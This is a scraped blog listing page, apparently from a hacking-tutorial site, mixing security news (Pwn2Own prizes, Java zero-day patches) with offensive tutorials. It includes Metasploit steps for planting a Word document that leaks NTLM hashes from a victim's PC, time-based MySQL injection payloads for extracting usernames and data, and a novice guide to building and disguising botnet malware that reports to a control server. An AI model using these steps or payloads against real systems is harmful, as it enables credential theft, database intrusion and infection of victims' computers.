style="color: #333333;"><span style="line-height: 19px;">This article has been written by Dr. Sindhia Javed Junejo. She is one of the core members of RHA team.</span></span></div></div>

How To Dodge Android 4.1.2 Passcode Lock - Vulnerability Exploited And Explained

Do you want to elude Note II's security even for a brief moment? With iOS 6.1.2 being owned by hackers , it was time that someone took a...

+ Read more »

Microsoft Word UNC Path Injector

<div dir="ltr" style="text-align: left;" trbidi="on">This module modifies a .docx file that will, upon opening, submit stored netNTLM credentials to a remote host. It can also create an empty docx file. If emailed the receiver needs to put the document in editing mode before the remote server will be contacted. Preview and read-only mode do not work. Verified to work with Microsoft Word 2003, 2007 and 2010 as of January 2013. In order to get the hashes the auxiliary/server/capture/smb module can be used.<br /><br />First Hack the Victim PC Using Metaspolit (<a href="http://tipstrickshack.blogspot.com/search/label/metasploit/" target="_blank">click here</a>)<br /><br />msfconsole<br /><br />use auxiliary/docx/word_unc_injector<br /><br />msf exploit (word_unc_injector)>set lhost 192.168.1.2 (IP of Local Host)<br /><br />msf exploit (word_unc_injector)>exploit<br /><br />Now we successfully generate the malicious docx File, it will stored on your local computer<br /><br />/root/.msf4/local/msf.docx<br /><br />Now use ‘upload ‘command to upload the msf.docx in victim pc using<br /><br />Upload /root/.msf4/local/msf.docx.<br /><br />Now use auxiliary/server/capture/smb<br /><br />msf exploit (smb)>run<br /><br />When victim open your msf.doc files you will get the password hash after get the victim password hashes, you can try to connect to another victim use the same password<br /></div>

Microsoft Word UNC Path Injector

This module modifies a .docx file that will, upon opening, submit stored netNTLM credentials to a remote host. It can also create an empty d...

+ Read more »

The Rise Of Ethical Hackers - Let The Bounty Hunting Begin!

<div dir="ltr" style="text-align: left;" trbidi="on"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZid02pWgkb5dqcwAZx6qTQUkwROwB9RDNjC7yg7BB9lqIBf6h78ozPNCIBNNDH_oWIWcCZ92jzLcWJMy-Gy_uWMjMC0ixcq_rPJLZi355bdOnDVMt3Bcx-gaiFg1E3iFmHf99TyUhZvo/s1600/hacking.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="480" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZid02pWgkb5dqcwAZx6qTQUkwROwB9RDNjC7yg7BB9lqIBf6h78ozPNCIBNNDH_oWIWcCZ92jzLcWJMy-Gy_uWMjMC0ixcq_rPJLZi355bdOnDVMt3Bcx-gaiFg1E3iFmHf99TyUhZvo/s640/hacking.jpg" width="577" /></a></div><br />Well, well well! It seems like our own favourite ethical hacker, <a href="http://www.rafayhackingarticles.net/2009/03/about-me.html" target="_blank"><b>Rafay Baloch</b></a>, is about to meet the clan  with whom he shares his talents! If you still haven't figured out who R.B is, please do your homework before falling in love with us! (yes, I said it!)<br /><br />Security researchers and ethical hackers are massing up in Vancouver at the CanSecWest conference this time of the year. The crowd is going to be equipped and ready to hunt down every vulnerability possible in Chrome, Internet, Explorer and Java (<b><a href="http://www.rafayhackingarticles.net/2013/02/facebooks-security-breeched-java-zero.html" target="_blank">good riddance since Java has attacked over and over again since 2013 began</a></b>). And in doing so, they will be able to bag generous cash prizes.<br /><a name='more'></a><br /><br />Pwn2Own is organising the event offering over half a million dollars in cash prizes for anyone who successfully attempts to ethically hack a selected target.<br /><br /><b>The rules are simple:</b><br /><br /><blockquote class="tr_bq">1. Vulnerability has to be previously unknown.<br />2. Computers should be running fully patched versions of Windows 7, 8 and OS X Mountain Lion<br />3. A full sandbox (if present) escape is required to win.</blockquote><br /><b><a href="http://dvlabs.tippingpoint.com/Pwn2OwnContestRules.html" rel="nofollow" target="_blank">Rules and Regulations</a></b> from Pwn2Own can be found on their link.<br /><br /><b>The list of targets and the cash prizes to be won are:</b><br /><br /><ul style="text-align: -webkit-auto;"><li>Web Browser</li><ul><li>Google Chrome on Windows 7: $100,000 plus the compromised laptop (estimated at $2,000) and 20,000 ZDI reward points (estimated at $10,000)</li><li>Microsoft Internet Explorer, either:</li><ul><li>IE 10 on Windows 8: $100,000 plus the compromised laptop (estimated at $2,000) and 20,000 ZDI reward points (estimated at $10,000), or</li><li>IE 9 on Windows 7:  $75,000 plus the compromised laptop (estimated at $2,000) and 20,000 ZDI reward points (estimated at $10,000)</li></ul><li>Mozilla Firefox on Windows 7:  $60,000 plus the compromised laptop (estimated at $2,000) and 20,000 ZDI reward points (estimated at $10,000)</li><li>Apple Safari on OS X Mountain Lion:  $65,000 plus the compromised laptop (estimated at $2,000) and 20,000 ZDI reward points (estimated at $10,000)</li></ul><li>Web Browser Plug-ins using Internet Explorer 9 on Windows 7</li><ul><li>Adobe Reader XI ($70,000) plus the compromised laptop (estimated at $2,000) and 20,000 ZDI reward points (estimated at $10,000)</li><li>Adobe Flash ($70,000) plus the compromised laptop (estimated at $2,000) and 20,000 ZDI reward points (estimated at $10,000)</li><li>Oracle Java ($20,000) plus the compromised laptop (estimated at $2,000) and 20,000 ZDI reward points (estimated at $10,000)</li></ul></ul><br /><br />On the other hand, Google is arranging its own competition with the name of <b>Pwnium 3</b>. Pwnium 3 focuses on finding vulnerabilities in Chrome OS and is offering a more-than-generous $3.14159 million is reward. This particular competition will be based on Samsung S5 550 Chromebook running the latest version of Chrome OS. You will need to successfully exploit the browser or system of the device logged in as a guest or a user or "compromise with device persistence - guest to guest with interim reboot, delivered via a webpage."<br /><div class="separator" style="clear: both; text-align: center;"><br /></div><br />Our readers should take in notice to upgrade and update their systems with the latest versions of softwares to stay safe from cybercrimes and attacks.<br /><br />Ethical hacking has been on the rise since bounty hunters tend to look for every possible way to attack a system to earn their much deserved prize money. Therefore, many International companies are encouraging hackers to join them in their pursuit for safe and secure softwares, programs, systems and the like.<br /><br />Our own bounty hunter and ethical hacker Rafay Baloch has done so many a times and has been awarded with <b><a href="http://www.rafayhackingarticles.net/2012/12/paypal-pays-me-total-bounty-of-10000.html" target="_blank">prize money from PayPal</a></b>, job offers from big-shot companies and cell phones from Nokia. A proud people we are!<br /><br />Rafay Baloch and his team members (including I) have made it our mission to spread awareness regarding <b>Ethical Hacking </b>and its advantages. Believe us people, its always better to do the right thing and get paid, then do the wrong one and get caught.<br /><br />Let the hunting begin!<br /><br />Cheers!<br /><br /><b>About the Author:</b><br />This article has been written by Dr. Sindhia Javed Junejo. She is one of the core members of RHA team.</div>

The Rise Of Ethical Hackers - Let The Bounty Hunting Begin!

Well, well well! It seems like our own favourite ethical hacker, Rafay Baloch , is about to meet the clan  with whom he shares his talents! ...

+ Read more »

Java Zero-Day Vulnerabilities Fixed By Oracle

<div dir="ltr" style="text-align: left;" trbidi="on"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNkdmLe33etAS9uKXBrbUrPeOKTquSh0YF4cvJbtNDE4Wa5W4NAZT7e-211BMFS3dl5eIiHobSjhZMs9XBlWXpf-EnZEUwvXfTAyIz45Q3-JoIb2bPyLZNj5JBdxpskFTOq0TTexuP7Kk/s1600/target-java.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: inherit;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNkdmLe33etAS9uKXBrbUrPeOKTquSh0YF4cvJbtNDE4Wa5W4NAZT7e-211BMFS3dl5eIiHobSjhZMs9XBlWXpf-EnZEUwvXfTAyIz45Q3-JoIb2bPyLZNj5JBdxpskFTOq0TTexuP7Kk/s400/target-java.png" width="400" /></span></a></div><div style="text-align: left;"><span style="font-family: inherit;"><br /></span></div><div style="text-align: left;"><span style="font-family: inherit;"><br /></span></div><div style="text-align: left;"><span style="font-family: inherit;">We recently <b><a href="http://www.rafayhackingarticles.net/2013/03/java-zero-day-vulnerability-spotted-in.html" target="_blank">reported two Java zero-day vulnerabilities</a> </b>that were spotted in the wild by <b>FireEye</b> now identified as the CVE-2013-1493 and CVE-2013-0809. One of these (CVE-2103-1493) was exploited by hackers to install McRat, an executable file, onto the user's machine and was therefore found to be more critical than the other.</span></div><div style="text-align: left;"></div><a name='more'></a><br /><div style="text-align: left;"><span style="font-family: inherit;"><br /></span></div><div style="text-align: left;"><span style="font-family: inherit;">These vulnerabilities were reported to the company and were expected to be fixed in April's Critical Patch Update. But active exploitation of the above stated vulnerabilities has driven the company to roll out an <b><a href="http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html" rel="nofollow" target="_blank">Emergency update</a></b>. </span></div><div style="text-align: left;"><span style="font-family: inherit;"><br /></span></div><blockquote class="tr_bq" style="text-align: left;"><i><span style="font-family: inherit;"><span style="color: black;">The company intended to include a fix for CVE-2013-1493 in the April 16, 2013 Critical Patch Update for Java SE (note that Oracle recently announced its intent to have an additional Java SE security release on this date in addition to those previously scheduled in June and October of 2013).  However, in light of the reports of active exploitation of CVE-2013-1493, and in order to help maintain the security posture of all Java SE users, Oracle decided to release a fix for this vulnerability and another closely related bug as soon as possible through this </span><a href="http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html" style="color: black;"><span style="color: black;">Security Alert</span></a><span style="color: black;">.</span></span></i></blockquote><div class="MsoNormal" style="background-color: white; color: #555555; font-size: 12px; line-height: 18px; margin: 0in 0in 10pt; text-align: -webkit-auto;"></div><div class="MsoNormal" style="background-color: white; color: #555555; font-size: 12px; line-height: 18px; margin: 0in 0in 10pt; text-align: -webkit-auto;"><span style="font-family: inherit;">Previously, we suggested our users to uninstall Java if they didn't wanna be preyed upon via the McRat executable file but Oracle has been kind enough to provide us with a more suitable option to install the new version of Java or autoupdate it.</span></div><blockquote class="tr_bq" style="text-align: left;"><i><span style="font-family: inherit;"><span style="color: black;">Desktop users should also be aware that Oracle has recently switched </span><a href="http://docs.oracle.com/javase/7/docs/technotes/guides/jweb/client-security.html" style="color: black;"><span style="color: black;">Java security settings to “high”</span></a><span style="color: black;"> by default.  This high security setting results in requiring users to expressly authorize the execution of applets which are either unsigned or are self-signed.  As a result, unsuspecting users visiting malicious web sites will be notified before an applet is run and will gain the ability to deny the execution of the potentially malicious applet.  In order to protect themselves, desktop users should only allow the execution of applets when they expect such applets and trust their origin.</span></span></i></blockquote><div class="MsoNormal" style="background-color: white; color: #555555; font-size: 12px; line-height: 18px; margin: 0in 0in 10pt; text-align: -webkit-auto;"></div><div class="MsoNormal" style="background-color: white; margin: 0in 0in 10pt; text-align: left;"><span style="font-family: inherit;">We would request our readers to update their versions of Java as soon as possible to refrain from being attacked. As they say, 'Prevention is better than cure'!</span></div><div class="MsoNormal" style="background-color: white; margin: 0in 0in 10pt; text-align: left;"><span style="font-family: inherit;">Cheers!</span></div><div class="MsoNormal" style="background-color: white; margin: 0in 0in 10pt; text-align: left;"><b><span style="font-family: inherit;">About the Author:</span></b></div><div class="MsoNormal" style="background-color: white; margin: 0in 0in 10pt; text-align: left;"><span style="font-family: inherit;">This article has been written by Dr. Sindhia Javed Junejo. She is one of the core members of RHA team.</span></div></div>

Java Zero-Day Vulnerabilities Fixed By Oracle

We recently reported two Java zero-day vulnerabilities that were spotted in the wild by FireEye now identified as the CVE-2013-1493 and CV...

+ Read more »

MySQL Injection Time Based

<div dir="ltr" style="text-align: left;" trbidi="on"><br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXp0hBjFIlNQhVoAcjABuX8_x_g3Ru3XMIrzBswLEx4K4IxmwXhfKgKADz1hwV4Jr5Kv2L9Xuw970DRrzbIy8Kt6c3zDhmngR71DRJ9T3eldRkBddd14XnvUYpmD2lCqXZ0qqAguSridY/s1600/sqlinjection+(1).jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="154" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXp0hBjFIlNQhVoAcjABuX8_x_g3Ru3XMIrzBswLEx4K4IxmwXhfKgKADz1hwV4Jr5Kv2L9Xuw970DRrzbIy8Kt6c3zDhmngR71DRJ9T3eldRkBddd14XnvUYpmD2lCqXZ0qqAguSridY/s320/sqlinjection+(1).jpg" width="320" /></a>We have already written a couple of posts on SQL Injection techniques, Such as "<a href="http://www.rafayhackingarticles.net/2013/02/sql-injection-basics-union-based.html" target="_blank">SQL Injection Union Based</a>", "<a href="http://www.rafayhackingarticles.net/2013/02/blind-sql-injection-detection-and.html" target="_blank">Blind SQL Injection</a>" and last but not least <b>"<a href="http://www.rafayhackingarticles.net/2013/02/solutions-related-to-sql-injection.html" target="_blank">Common problems faced while performing SQL Injection</a>", </b>However how could the series miss the "<b>Time based SQL injection"</b> technqiues, @yappare has came with another excellent post, which explains how this attack can be used to perfrom wide variety of attacks, over to @yappare.<br /><br />Hey everyone! Its another post by me again, @yappare. Today as I promised to our Mr Rafay previously that i would write a tutorial for RHA on MySQL Time based technique, here's a simple tutorial on MySQL Time Based SQLi, Before that, as usual here are some good references for those interested in SQLi<br /><div class="separator" style="clear: both; text-align: left;">http://technet.microsoft.com/en-us/library/cc512676.aspx</div><div class="separator" style="clear: both; text-align: left;"></div><a name='more'></a><br /><div class="separator" style="clear: both; text-align: left;">and of course the greatest cheatsheet, http://pentestmonkey.net/category/cheat-sheet</div><div class="separator" style="clear: both; text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: left;">OK back to our testing machine. In this example,I'll use OWASP WebApps Vulnerable machine.</div><div class="separator" style="clear: both; text-align: left;">Tested on Peruggia application.</div><div class="separator" style="clear: both; text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: left;">Lets gO!</div><div class="separator" style="clear: both; text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: left;">Previously, we already knew that in this parameter, pic_id is vulnerable to SQLi. So,let say we want to use Time Based Attack to this vulnerable parameter,here what we are going to do.</div><div class="separator" style="clear: both; text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: left;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUavLBIynCwdPyIwvVmvMC5GHPpBSMZyu9RHyCvAwLgpEDLB_35E1J60V087GdGcWbwZgsmawcQvd6fkkdu16j1KstB6ODA28kfpDQlVHfsah3HXkX0KQTqyw-OBzl6Thusw1F77yh1cs/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" height="318" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUavLBIynCwdPyIwvVmvMC5GHPpBSMZyu9RHyCvAwLgpEDLB_35E1J60V087GdGcWbwZgsmawcQvd6fkkdu16j1KstB6ODA28kfpDQlVHfsah3HXkX0KQTqyw-OBzl6Thusw1F77yh1cs/s640/1.png" width="577" /></a></div><div class="separator" style="clear: both; text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: left;">But first,do note that in MySQL, for Time Based SQLi, we are going to use SLEEP() function.</div><div class="separator" style="clear: both; text-align: left;">each DBMS have different type of function to use,but the steps usually quite similar.</div><div class="separator" style="clear: both; text-align: left;">In MSSQL we use WAITFOR DELAY</div><div class="separator" style="clear: both; text-align: left;">In POSTGRES we use PG_DELAY()</div><div class="separator" style="clear: both; text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: left;">and so on..do check it on pentestmonkey cheatsheet :D</div><div class="separator" style="clear: both; text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: left;">Back to our testing. So lets try to check either Time Based Attack can be done on the parameter or not.</div><div class="separator" style="clear: both; text-align: left;">Test it using this command</div><div class="separator" style="clear: both; text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: left;"><b><i>pic_id=13 and sleep(5)--</i></b></div><div class="separator" style="clear: both; text-align: left;"><b><i><br /></i></b></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcPBQI7aEG202pkSrnNO35O5y8PR_YhFDwOEEHeaR3qfYkbR_0rfrOibfM2qkkl1y9rFmNG7PvRvKPyvoIb20bHQOEj8bq8SPKLzvTgiSBdnSYVLTJFZ-z2zOk_KSsEpk5_07QZSmvZJs/s1600/2.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="496" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcPBQI7aEG202pkSrnNO35O5y8PR_YhFDwOEEHeaR3qfYkbR_0rfrOibfM2qkkl1y9rFmNG7PvRvKPyvoIb20bHQOEj8bq8SPKLzvTgiSBdnSYVLTJFZ-z2zOk_KSsEpk5_07QZSmvZJs/s640/2.png" width="577" /></a></div><div class="separator" style="clear: both; text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: left;">As we can see from the image above, there's a different between the requests. The 1st one is a normal request where the response time is 0 sec. While the 2nd request I include the SLEEP() command for 5 seconds before the server response. So from here we know that its can be attack via Time Based as well.</div><div class="separator" style="clear: both; text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: left;"><u>Lets proceed to check the current user.</u></div><div class="separator" style="clear: both; text-align: left;">Here's the command the we are going to use</div><div class="separator" style="clear: both; text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: left;"><b><i>pic_id=13 and if(substring(user(),1,1)='a',SLEEP(5),1)--</i></b></div><div class="separator" style="clear: both; text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: left;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhy9o1XorCLvnzhcXI-WvfbXN07MmBrVhGh7bGPQN3-GAErcJPcYE5JdHQY5K3DPjEzAUJpsAsC7OFy_df-piWJwMg0fH4cO4i0rkeZ9kNdbhreq98es3U-05eodvYEgCMt4oaTWHMH7Q0/s1600/3.png" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" height="577" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhy9o1XorCLvnzhcXI-WvfbXN07MmBrVhGh7bGPQN3-GAErcJPcYE5JdHQY5K3DPjEzAUJpsAsC7OFy_df-piWJwMg0fH4cO4i0rkeZ9kNdbhreq98es3U-05eodvYEgCMt4oaTWHMH7Q0/s640/3.png" width="601" /></a></div><div class="separator" style="clear: both; text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: left;">Where from the query, if the current user's 1st word is equal to 'a', the server will sleep for 5 seconds before responding. If not,the server will response at its normal response time.Then you should proceed to test with other characters.</div><div class="separator" style="clear: both; text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: left;">From the image above,clearly we can see that the 1st and 2nd request, the server responded at 0 second. While the 3rd request,the server delayed for 5 seconds. Why?</div><div class="separator" style="clear: both; text-align: left;">Because the 1st character of the current user start with 'p'.. not 'a' or 'h'</div><div class="separator" style="clear: both; text-align: left;">Then you can proceed to check for its 2nd character and so on.</div><div class="separator" style="clear: both; text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: left;"><b><i>pic_id=13 and if(substring(user(),2,1)='a',SLEEP(5),1)--</i></b></div><div class="separator" style="clear: both; text-align: left;"><b><i>pic_id=13 and if(substring(user(),3,1)='a',SLEEP(5),1)--</i></b></div><div class="separator" style="clear: both; text-align: left;"><b><i>so on..</i></b></div><div class="separator" style="clear: both; text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: left;"><u>So go on with table_name guessing.</u></div><div class="separator" style="clear: both; text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: left;"><i><b>pic_id=13 and IF(SUBSTRING((select 1 from [guess_your_table_name] limit 0,1),1,1)=1,SLEEP(5),1)</b></i></div><div class="separator" style="clear: both; text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEisAJta02gQfJs_texSLYaPK1WSbP4o8NEC0wu-yOiSJnLFsb1JrR5yWFvwkZOc63Z9V8qqny3KffJGrASRWquUsLdtqRfU9kVqZnl-XGq4YDzQw-XJtk9zgjtHYuR2sFAtWVMfxhP8vbE/s1600/4.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="499" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEisAJta02gQfJs_texSLYaPK1WSbP4o8NEC0wu-yOiSJnLFsb1JrR5yWFvwkZOc63Z9V8qqny3KffJGrASRWquUsLdtqRfU9kVqZnl-XGq4YDzQw-XJtk9zgjtHYuR2sFAtWVMfxhP8vbE/s640/4.png" width="577" /></a></div><div class="separator" style="clear: both; text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: left;">The 1st request is FALSE,because the server response is 0 second.There's no table_name=user exist then.</div><div class="separator" style="clear: both; text-align: left;">While the 2nd request,the server delayed for 5 seconds,so a table_name=users do exist!</div><div class="separator" style="clear: both; text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: left;"><u>How about guessing the column_name?Its easy.</u></div><div class="separator" style="clear: both; text-align: left;"><b><i><br /></i></b></div><div class="separator" style="clear: both; text-align: left;"><b><i>pic_id=13 and IF(SUBSTRING((select substring(concat(1,[guess_your_column_name]),1,1) from [existing_table_name] limit 0,1),1,1)=1,SLEEP(5),1)</i></b></div><div class="separator" style="clear: both; text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgS0ErXbo1EGYvaGNn7bi8PIPjoAYGYyYJjZ-AGRNWf4HVSIufHYOxFn-KnxZOFRfFhMMx90MxL5oiM-e4s1LeNEaGRMfEcHkBoCk1dFgIbP6ExD51xwuzOeBOy6FAVZB7BS65bp79qyAk/s1600/5.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="499" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgS0ErXbo1EGYvaGNn7bi8PIPjoAYGYyYJjZ-AGRNWf4HVSIufHYOxFn-KnxZOFRfFhMMx90MxL5oiM-e4s1LeNEaGRMfEcHkBoCk1dFgIbP6ExD51xwuzOeBOy6FAVZB7BS65bp79qyAk/s640/5.png" width="577" /></a></div><div class="separator" style="clear: both; text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: left;">See the image above?Still need any explanation? I bet you guys already understand it! :D</div><div class="separator" style="clear: both; text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: left;"><u>Get the data mode!</u></div><div class="separator" style="clear: both; text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: left;"><b><i>pic_id=13 and if((select mid(column_name,1,1) from table_name limit 0,1)='a',sleep(5),1)--</i></b></div><div class="separator" style="clear: both; text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: left;">So,if the 1st character of data at the right column_name in the right table_name = 'a', the server will delayed for 5 seconds. </div><div class="separator" style="clear: both; text-align: left;">And then proceed to test the 2nd,3rd char and so on..</div><div class="separator" style="clear: both; text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjNSq9iQvYLKyyMBuYABMN08wv41G8v60v90o8ZkAgVbXeUt1jyFBCF1kG-RqdlYxGCXg04gVdqB00ov6zS4jpVS1U3spvKOs9vMMO2A9HZTHbxX2ffHfTBpGgeGoYNMxgLmHB2JsYad_8/s1600/6.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="348" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjNSq9iQvYLKyyMBuYABMN08wv41G8v60v90o8ZkAgVbXeUt1jyFBCF1kG-RqdlYxGCXg04gVdqB00ov6zS4jpVS1U3spvKOs9vMMO2A9HZTHbxX2ffHfTBpGgeGoYNMxgLmHB2JsYad_8/s640/6.png" width="577" /></a></div><div class="separator" style="clear: both; text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: left;">The image shown that the username=admin..so is it correct?lets double check it</div><div class="separator" style="clear: both; text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPuM8qrCdyN5HV8WRD4aqVdZCnl5z2HihbN1g-kuznLo6YNYm7rIsK_TwqmtADOy4bLldC_xKknXTtQWhdETouIq9SAQPwfUvKjyb2cRHr9_W_MLWLmSpi1Ou8g1CPG7b66xO47_Hs5qQ/s1600/7.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="166" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPuM8qrCdyN5HV8WRD4aqVdZCnl5z2HihbN1g-kuznLo6YNYm7rIsK_TwqmtADOy4bLldC_xKknXTtQWhdETouIq9SAQPwfUvKjyb2cRHr9_W_MLWLmSpi1Ou8g1CPG7b66xO47_Hs5qQ/s400/7.png" width="400" /></a></div><div class="separator" style="clear: both; text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: left;">Yeahhh.its correct.</div><div class="separator" style="clear: both; text-align: left;">That's all for now!</div><div class="separator" style="clear: both; text-align: left;">Thanks,</div><div class="separator" style="clear: both; text-align: left;">@yappare</div></div>

MySQL Injection Time Based

We have already written a couple of posts on SQL Injection techniques, Such as " SQL Injection Union Based ", " Blind SQL Inj...

+ Read more »

How Hackers Make Botnets To Infect Systems [Part 2]

<div dir="ltr" style="text-align: left;" trbidi="on"><div class="separator" style="clear: both; text-align: center;"><a href="http://oi48.tinypic.com/286wpvq.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="http://oi48.tinypic.com/286wpvq.jpg" width="320" /></a></div><span id="goog_1986115820"></span><span id="goog_1986115821"></span><br />Hello RHA readers, we are back with How To Setup A Botnet [Tutorial For Noobs] [Part 2]. Those who haven't read previous part than check the first part in order to understand part two, as it is the sequel of How to setup a Botnet.<br /><br /><b><a href="http://www.rafayhackingarticles.net/2013/03/how-to-setup-botnet-tutorial-for-noobs.html" target="_blank">Part 1: How To Setup A Botnet [Tutorial For Noobs] [Part 1]</a></b><br /><br /><a name='more'></a>So in this part we will teach you how to setup a Botnet.<br /><h4>Step 1:</h4>Now after hosting the server, Extract Bot builder in you computer.<br />Download it from here http://www.mediafire.com/?hb9ou6g50a620nb <br /><h4>Step 2:</h4>After extracting, you'll a application for BOT Building with 'VNBuilder' name.<br />Run the application.<br />It would be like as shown in image:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://oi48.tinypic.com/1538f3q.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="267" src="http://oi48.tinypic.com/1538f3q.jpg" width="320" /></a></div><br /><h4> step 3:</h4>Check the box in the below.<br /><h4>Step 4:</h4>Now go in the 'Web Setting' Tab. Type the website where you have set your server in ROOT WEBSITE URL column. Remember your website url should be like www.yourwebsite.com this, No Http:// in starting. Leave the port number as it is. Now type the folder in which your server is set, And it should be like /folder name/. leave All other thing as it is. As it is shown in image: <br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://oi49.tinypic.com/2e51s1y.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="261" src="http://oi49.tinypic.com/2e51s1y.jpg" width="320" /></a></div><br /><h4> Step 5:</h4>Now Go to Load settings tab, check the 'INSTALL LOADER TO START UP' option. Like in the image:<br /><br /><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"><a href="http://oi48.tinypic.com/14wv9k9.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="264" src="http://oi48.tinypic.com/14wv9k9.jpg" width="320" /></a></div><br /><br /><br /><h4>Step 6:</h4>Proceed to last Tab BUILD LOADER, Now if you want to change icon of your virus than go to top right of under build loader tab, You can add icons their for your virus, additional icons are given with builder. You can even change the extention from .exe to .bat and few others, In the bottom of window you can find option to change extension. Now In the last click Build. <br />Builder will ask where to save with which name, provide your desire one. <br /><h4>Step 7:</h4>You've successfully created Bot. Now in order to check whether the bot is working or not RUN it in you Computer, Turn your antivirus It'll detect the virus. After running virus, go and login in the server you made in part one of this tutorial. If your virus is created Successfully than you IP will be appearing in the server list with your computer name. Like mine:<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://oi45.tinypic.com/1231non.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="212" src="http://oi45.tinypic.com/1231non.jpg" width="577" /></a></div>If your Ip appearing, than you have configured Botnet successfully. Congratulations.<br />Thanks for reading, Stay tuned with us for more tutorials!<br /><br /><h4>About The Author</h4><br />This article has been written by Fahad awan, Who has recently joined RHA's team, We wish him best of luck and hope that he enjoys working for RHA.</div>

How Hackers Make Botnets To Infect Systems [Part 2]

Hello RHA readers, we are back with How To Setup A Botnet [Tutorial For Noobs] [Part 2]. Those who haven't read previous part than check...

+ Read more »

Another Java Zero-Day Vulnerability Spotted In The Wild

